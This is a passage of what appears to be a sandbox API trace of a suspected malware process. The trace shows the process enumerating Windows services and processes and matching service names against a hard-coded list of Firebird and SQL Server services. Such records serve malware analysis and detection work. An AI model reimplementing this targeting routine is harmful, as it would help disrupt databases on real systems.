lpString2="SecurityHealthService") returned -1 [0155.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0155.791] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0155.791] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0155.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0155.791] lstrlenW (lpString="SENS") returned 4 [0155.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0155.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0155.791] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0155.791] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0155.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0155.791] lstrlenW (lpString="ShellHWDetection") returned 16 [0155.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0155.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0155.792] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0155.792] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0155.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0155.792] lstrlenW (lpString="Spooler") returned 7 [0155.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0155.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0155.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0155.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0155.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0155.792] lstrlenW (lpString="StateRepository") returned 15 [0155.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0155.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0155.792] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0155.792] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0155.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0155.792] lstrlenW (lpString="SysMain") returned 7 [0155.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0155.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0155.792] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0155.792] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0155.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0155.792] lstrlenW (lpString="SystemEventsBroker") returned 18 [0155.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0155.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0155.792] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0155.792] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0155.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0155.793] lstrlenW (lpString="Themes") returned 6 [0155.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0155.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0155.793] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0155.793] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0155.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0155.793] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0155.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0155.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0155.793] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0155.793] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0155.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0155.793] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0155.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0155.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0155.793] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0155.793] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0155.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4503078 | out: hHeap=0x6a0000) returned 1 [0155.793] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0156.299] Process32FirstW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.299] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0156.300] lstrlenW (lpString="System") returned 6 [0156.300] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0156.301] lstrlenW (lpString="smss.exe") returned 8 [0156.301] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.302] lstrlenW (lpString="csrss.exe") returned 9 [0156.302] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0156.303] lstrlenW (lpString="wininit.exe") returned 11 [0156.303] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.304] lstrlenW (lpString="csrss.exe") returned 9 [0156.304] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0156.305] lstrlenW (lpString="winlogon.exe") returned 12 [0156.305] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0156.306] lstrlenW (lpString="services.exe") returned 12 [0156.306] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0156.307] lstrlenW (lpString="lsass.exe") returned 9 [0156.307] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0156.308] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0156.308] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0156.308] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0156.309] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.309] lstrlenW (lpString="svchost.exe") returned 11 [0156.309] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.310] lstrlenW (lpString="svchost.exe") returned 11 [0156.310] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0156.311] lstrlenW (lpString="dwm.exe") returned 7 [0156.311] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.312] lstrlenW (lpString="svchost.exe") returned 11 [0156.312] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.313] lstrlenW (lpString="svchost.exe") returned 11 [0156.313] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.314] lstrlenW (lpString="svchost.exe") returned 11 [0156.314] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.314] lstrlenW (lpString="svchost.exe") returned 11 [0156.314] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.315] lstrlenW (lpString="svchost.exe") returned 11 [0156.315] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.316] lstrlenW (lpString="svchost.exe") returned 11 [0156.316] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.317] lstrlenW (lpString="svchost.exe") returned 11 [0156.317] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.318] lstrlenW (lpString="svchost.exe") returned 11 [0156.318] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.319] lstrlenW (lpString="svchost.exe") returned 11 [0156.319] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.319] lstrlenW (lpString="svchost.exe") returned 11 [0156.320] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0156.320] lstrlenW (lpString="spoolsv.exe") returned 11 [0156.320] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.321] lstrlenW (lpString="svchost.exe") returned 11 [0156.321] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0156.322] lstrlenW (lpString="audiodg.exe") returned 11 [0156.322] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0156.323] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0156.323] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0156.324] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0156.324] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0156.324] lstrlenW (lpString="Memory Compression") returned 18 [0156.324] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0156.325] lstrlenW (lpString="sihost.exe") returned 10 [0156.325] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.326] lstrlenW (lpString="svchost.exe") returned 11 [0156.326] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0156.327] lstrlenW (lpString="msoia.exe") returned 9 [0156.327] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.328] lstrlenW (lpString="taskhostw.exe") returned 13 [0156.328] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0156.328] lstrlenW (lpString="explorer.exe") returned 12 [0156.328] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0156.329] lstrlenW (lpString="SearchUI.exe") returned 12 [0156.329] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0156.330] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0156.330] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0156.331] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0156.331] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.332] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0156.332] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0156.333] lstrlenW (lpString="hgaibc.exe") returned 10 [0156.333] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0156.334] lstrlenW (lpString="cmd.exe") returned 7 [0156.334] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0156.334] lstrlenW (lpString="conhost.exe") returned 11 [0156.334] Process32NextW (in: hSnapshot=0x380, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0156.335] CloseHandle (hObject=0x380) returned 1 [0156.335] Sleep (dwMilliseconds=0x1f4) [0157.482] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3e44178 [0157.483] EnumServicesStatusExW (in: hSCManager=0x3e44178, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0157.483] GetLastError () returned 0xea [0157.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x703a60 [0157.483] EnumServicesStatusExW (in: hSCManager=0x3e44178, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x703a60, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x703a60, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0157.484] CloseServiceHandle (hSCObject=0x3e44178) returned 1 [0157.484] lstrlenW (lpString="AppXSvc") returned 7 [0157.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0157.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0157.484] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0157.484] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0157.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0157.484] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0157.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0157.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0157.484] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0157.484] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0157.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0157.484] lstrlenW (lpString="Audiosrv") returned 8 [0157.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0157.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0157.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0157.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0157.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0157.484] lstrlenW (lpString="BFE") returned 3 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0157.485] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0157.485] lstrlenW (lpString="CDPSvc") returned 6 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0157.485] lstrlenW (lpString="ClickToRunSvc") returned 13 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0157.485] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0157.485] lstrlenW (lpString="CryptSvc") returned 8 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0157.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0157.485] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0157.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0157.485] lstrlenW (lpString="DcomLaunch") returned 10 [0157.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", 